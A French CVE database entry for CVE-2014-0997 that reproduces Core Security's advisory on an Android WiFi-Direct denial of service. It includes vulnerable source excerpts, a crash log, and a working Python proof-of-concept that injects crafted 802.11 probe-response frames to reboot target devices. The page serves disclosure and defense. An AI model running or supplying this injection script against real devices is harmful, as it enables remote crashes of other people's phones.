Faiblesses connexes
CWE-ID |
Nom de la faiblesse |
Source |
CWE-19 |
Category : Data Processing Errors Weaknesses in this category are typically found in functionality that processes data. Data processing is the manipulation of input to retrieve or save information. |
|
Métriques
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V3.0 |
7.5 |
HIGH |
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Base: Exploitabilty MetricsThe Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component. Attack Vector This metric reflects the context by which vulnerability exploitation is possible. A vulnerability exploitable with network access means the vulnerable component is bound to the network stack and the attacker's path is through OSI layer 3 (the network layer). Such a vulnerability is often termed 'remotely exploitable' and can be thought of as an attack being exploitable one or more network hops away (e.g. across layer 3 boundaries from routers). Attack Complexity This metric describes the conditions beyond the attacker's control that must exist in order to exploit the vulnerability. Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success against the vulnerable component. Privileges Required This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability. The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files to carry out an attack. User Interaction This metric captures the requirement for a user, other than the attacker, to participate in the successful compromise of the vulnerable component. The vulnerable system can be exploited without interaction from any user. Base: Scope MetricsAn important property captured by CVSS v3.0 is the ability for a vulnerability in one software component to impact resources beyond its means, or privileges. Scope Formally, Scope refers to the collection of privileges defined by a computing authority (e.g. an application, an operating system, or a sandbox environment) when granting access to computing resources (e.g. files, CPU, memory, etc). These privileges are assigned based on some method of identification and authorization. In some cases, the authorization may be simple or loosely controlled based upon predefined rules or standards. For example, in the case of Ethernet traffic sent to a network switch, the switch accepts traffic that arrives on its ports and is an authority that controls the traffic flow to other switch ports. An exploited vulnerability can only affect resources managed by the same authority. In this case the vulnerable component and the impacted component are the same. Base: Impact MetricsThe Impact metrics refer to the properties of the impacted component. Confidentiality Impact This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability. There is no loss of confidentiality within the impacted component. Integrity Impact This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. There is no loss of integrity within the impacted component. Availability Impact This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability. There is total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable). Temporal MetricsThe Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence that one has in the description of a vulnerability. Environmental Metrics
|
[email protected] |
V2 |
5 |
|
AV:N/AC:L/Au:N/C:N/I:N/A:P |
[email protected] |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 35913
Date de publication : 2015-01-25 23h00 +00:00
Auteur : Core Security
EDB Vérifié : Yes
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/
Android WiFi-Direct Denial of Service
1. *Advisory Information*
Title: Android WiFi-Direct Denial of Service
Advisory ID: CORE-2015-0002
Advisory URL:
http://www.coresecurity.com/advisories/android-wifi-direct-denial-service
Date published: 2015-01-26
Date of last update: 2015-01-26
Vendors contacted: Android Security Team
Release mode: User release
2. *Vulnerability Information*
Class: Uncaught Exception [CWE-248]
Impact: Denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2014-0997
3. *Vulnerability Description*
Some Android devices are affected by a Denial of Service attack when
scanning for WiFi Direct devices.
An attacker could send a specially crafted 802.11 Probe Response frame
causing the Dalvik subsystem to reboot because of an Unhandle Exception
on WiFiMonitor class.
4. *Vulnerable Packages*
. Nexus 5 - Android 4.4.4
. Nexus 4 - Android 4.4.4
. LG D806 - Android 4.2.2
. Samsung SM-T310 - Android 4.2.2
. Motorola RAZR HD - Android 4.1.2
Other devices could be also affected.
5. *Non-vulnerable packages*
. Android 5.0.1
. Android 5.0.2
6. *Vendor Information, Solutions and Workarounds*
Some mitigation actions may be to avoid using WiFi-Direct or update
to a non-vulnerable Android version.
Contact vendor for further information.
7. *Credits*
This vulnerability was discovered and researched by Andres Blanco
from the CoreLabs
Team. The publication of this advisory was coordinated by the Core
Advisories
Team.
8. *Technical Description / Proof of Concept Code*
Android makes use of a modified *wpa_supplicant*[1]
in order to provide an interface between the wireless driver and the
Android platform framework.
Below the function that handles *wpa_supplicant* events. This function
returns a jstring from calling NewStringUTF method.
/-----
static jstring android_net_wifi_waitForEvent(JNIEnv* env, jobject)
{
char buf[EVENT_BUF_SIZE];
int nread = ::wifi_wait_for_event(buf, sizeof buf);
if (nread > 0) {
return env->NewStringUTF(buf);
} else {
return NULL;
}
}
-----/
The WiFi-Direct specification defines the P2P discovery procedure to
enable P2P
devices to exchange device information, the device name is part of
this information.
The WifiP2pDevice class, located at
/wifi/java/android/net/wifi/p2p/WifiP2pDevice.java,
represents a Wi-Fi p2p device. The constructor method receives the
string provided by
the *wpa_supplicant* and throws an IllegalArgumentException in case
the event is malformed.
Below partial content of the WiFiP2PDevice.java file.
/-----
[...]
/** Detailed device string pattern with WFD info
* Example:
* P2P-DEVICE-FOUND 00:18:6b:de:a3:6e
p2p_dev_addr=00:18:6b:de:a3:6e
* pri_dev_type=1-0050F204-1 name='DWD-300-DEA36E'
config_methods=0x188
* dev_capab=0x21 group_capab=0x9
*/
private static final Pattern detailedDevicePattern =
Pattern.compile(
"((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) " +
"(\\d+ )?" +
"p2p_dev_addr=((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) " +
"pri_dev_type=(\\d+-[0-9a-fA-F]+-\\d+) " +
"name='(.*)' " +
"config_methods=(0x[0-9a-fA-F]+) " +
"dev_capab=(0x[0-9a-fA-F]+) " +
"group_capab=(0x[0-9a-fA-F]+)" +
"( wfd_dev_info=0x000006([0-9a-fA-F]{12}))?"
);
[...]
/**
* @param string formats supported include
* P2P-DEVICE-FOUND fa:7b:7a:42:02:13
p2p_dev_addr=fa:7b:7a:42:02:13
* pri_dev_type=1-0050F204-1 name='p2p-TEST1'
config_methods=0x188 dev_capab=0x27
* group_capab=0x0 wfd_dev_info=000006015d022a0032
*
* P2P-DEVICE-LOST p2p_dev_addr=fa:7b:7a:42:02:13
*
* AP-STA-CONNECTED 42:fc:89:a8:96:09
[p2p_dev_addr=02:90:4c:a0:92:54]
*
* AP-STA-DISCONNECTED 42:fc:89:a8:96:09
[p2p_dev_addr=02:90:4c:a0:92:54]
*
* fa:7b:7a:42:02:13
*
* Note: The events formats can be looked up in the
wpa_supplicant code
* @hide
*/
public WifiP2pDevice(String string) throws
IllegalArgumentException {
String[] tokens = string.split("[ \n]");
Matcher match;
if (tokens.length < 1) {
throw new IllegalArgumentException("Malformed supplicant
event");
}
switch (tokens.length) {
case 1:
/* Just a device address */
deviceAddress = string;
return;
case 2:
match = twoTokenPattern.matcher(string);
if (!match.find()) {
throw new IllegalArgumentException("Malformed
supplicant event");
}
deviceAddress = match.group(2);
return;
case 3:
match = threeTokenPattern.matcher(string);
if (!match.find()) {
throw new IllegalArgumentException("Malformed
supplicant event");
}
deviceAddress = match.group(1);
return;
default:
match = detailedDevicePattern.matcher(string);
if (!match.find()) {
throw new IllegalArgumentException("Malformed
supplicant event");
}
deviceAddress = match.group(3);
primaryDeviceType = match.group(4);
deviceName = match.group(5);
wpsConfigMethodsSupported = parseHex(match.group(6));
deviceCapability = parseHex(match.group(7));
groupCapability = parseHex(match.group(8));
if (match.group(9) != null) {
String str = match.group(10);
wfdInfo = new
WifiP2pWfdInfo(parseHex(str.substring(0,4)),
parseHex(str.substring(4,8)),
parseHex(str.substring(8,12)));
}
break;
}
if (tokens[0].startsWith("P2P-DEVICE-FOUND")) {
status = AVAILABLE;
}
}
[...]
-----/
On some Android devices when processing a probe response frame with a
WiFi-Direct(P2P)
information element that contains a device name attribute with
specific bytes generates
a malformed supplicant event string that ends up throwing the
IllegalArgumentException.
As this exception is not handled the Android system restarts.
Below partial content of the logcat of a Samsung SM-T310 running
Android 4.2.2.
/-----
I/p2p_supplicant( 2832): P2P-DEVICE-FOUND 00.EF.00
p2p_dev_addr=00.EF.00 pri_dev_type=10-0050F204-5 'fa¬¬'
config_methods=0x188 dev_capab=0x21 group_capab=0x0
E/AndroidRuntime( 2129): !@*** FATAL EXCEPTION IN SYSTEM PROCESS:
WifiMonitor
E/AndroidRuntime( 2129): java.lang.IllegalArgumentException:
Malformed supplicant event
E/AndroidRuntime( 2129): at
android.net.wifi.p2p.WifiP2pDevice.<init>(WifiP2pDevice.java:229)
E/AndroidRuntime( 2129): at
android.net.wifi.WifiMonitor$MonitorThread.handleP2pEvents(WifiMonitor.java:966)
E/AndroidRuntime( 2129): at
android.net.wifi.WifiMonitor$MonitorThread.run(WifiMonitor.java:574)
E/android.os.Debug( 2129): !@Dumpstate > dumpstate -k -t -z -d -o
/data/log/dumpstate_sys_error
-----/
8.1. *Proof of Concept*
This PoC was implemented using the open source library Lorcon
[2] and PyLorcon2 [3], a Python wrapper for the Lorcon library.
/-----
#!/usr/bin/env python
import sys
import time
import struct
import PyLorcon2
def get_probe_response(source, destination, channel):
frame = str()
frame += "\x50\x00" # Frame Control
frame += "\x00\x00" # Duration
frame += destination
frame += source
frame += source
frame += "\x00\x00" # Sequence Control
frame += "\x00\x00\x00\x00\x00\x00\x00\x00" # Timestamp
frame += "\x64\x00" # Beacon Interval
frame += "\x30\x04" # Capabilities Information
# SSID IE
frame += "\x00"
frame += "\x07"
frame += "DIRECT-"
# Supported Rates
frame += "\x01"
frame += "\x08"
frame += "\x8C\x12\x98\x24\xB0\x48\x60\x6C"
# DS Parameter Set
frame += "\x03"
frame += "\x01"
frame += struct.pack("B", channel)
# P2P
frame += "\xDD"
frame += "\x27"
frame += "\x50\x6F\x9A"
frame += "\x09"
# P2P Capabilities
frame += "\x02" # ID
frame += "\x02\x00" # Length
frame += "\x21\x00"
# P2P Device Info
frame += "\x0D" # ID
frame += "\x1B\x00" # Length
frame += source
frame += "\x01\x88"
frame += "\x00\x0A\x00\x50\xF2\x04\x00\x05"
frame += "\x00"
frame += "\x10\x11"
frame += "\x00\x06"
frame += "fafa\xFA\xFA"
return frame
def str_to_mac(address):
return "".join(map(lambda i: chr(int(i, 16)), address.split(":")))
if __name__ == "__main__":
if len(sys.argv) != 3:
print "Usage:"
print " poc.py <iface> <target>"
print "Example:"
print " poc.py wlan0 00:11:22:33:44:55"
sys.exit(-1)
iface = sys.argv[1]
destination = str_to_mac(sys.argv[2])
context = PyLorcon2.Context(iface)
context.open_injmon()
channel = 1
source = str_to_mac("00:11:22:33:44:55")
frame = get_probe_response(source, destination, channel)
print "Injecting PoC."
for i in range(100):
context.send_bytes(frame)
time.sleep(0.100)
-----/
9. *Report Timeline*
. 2014-09-26:
Core Security contacts Android security team to inform them that
a vulnerability has been found in Android. Core Security sends a draft
advisory with technical details and PoC files.
. 2014-09-29:
Android Security Team acknowledges reception of the advisory.
. 2014-09-30:
Core Security notifies that the tentative publication date is
set for Oct 20rd, 2014.
. 2014-09-30:
Android Security Team acknowledges.
. 2014-10-16:
Core Security requests a status update.
. 2014-10-16:
Android Security Team responds that they have classify the
vulnerability as low severity and don't currently have a timeline for
releasing a fix.
. 2014-10-20:
Core Security does not completely agrees with the vulnerability
classification and reschedule the publication of the advisory.
. 2014-10-16:
Android Security Team acknowledges and strengthens it's position
that they don't currently have a timeline for releasing a fix.
. 2015-01-06:
Core Security requests a status update.
. 2015-01-12:
Core Security asks for confirmation of reception of the previous
email.
. 2015-01-16:
Android Security Team acknowledges and respond that they don't
currently have a timeline for releasing a fix.
. 2015-01-19:
Core Security notifies that vendor cooperation is needed in
order to keep this process coordinated. If vendor refuses to provide the
requested information the advisory will be released tagged as 'user
release'. The advisory is re-scheduled for January 26th, 2015.
. 2015-01-20:
Android Security Team acknowledges and respond that they don't
currently have a timeline for releasing a fix.
. 2015-01-26:
The advisory CORE-2015-0002 is published.
10. *References*
[1] - wpa_supplicant site. http://w1.fi/wpa_supplicant/
[2] - Lorcon site. https://code.google.com/p/lorcon
[3] - PyLorcon2 site. http://code.google.com/p/pylorcon2
11. *About CoreLabs*
CoreLabs, the research center of Core Security, is charged with
anticipating
the future needs and requirements for information security technologies.
We conduct our research in several important areas of computer security
including system vulnerabilities, cyber attack planning and simulation,
source code auditing, and cryptography. Our results include problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies. CoreLabs regularly publishes security
advisories, technical papers, project information and shared software
tools for public use at:
http://corelabs.coresecurity.com.
12. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright
(c) 2014 Core Security and (c) 2014 CoreLabs,
and are licensed under a Creative Commons
Attribution Non-Commercial Share-Alike 3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
Products Mentioned
Configuraton 0
Google>>Android >> Version 4.4.4
Google>>Nexus_4 >> Version -
Google>>Nexus_5 >> Version -
Configuraton 0
Google>>Android >> Version 4.2.2
Lg>>D806 >> Version -
Samsung>>Sm-t310 >> Version -
Configuraton 0
Google>>Android >> Version 4.1.2
Motorola>>Razr_hd >> Version -
Références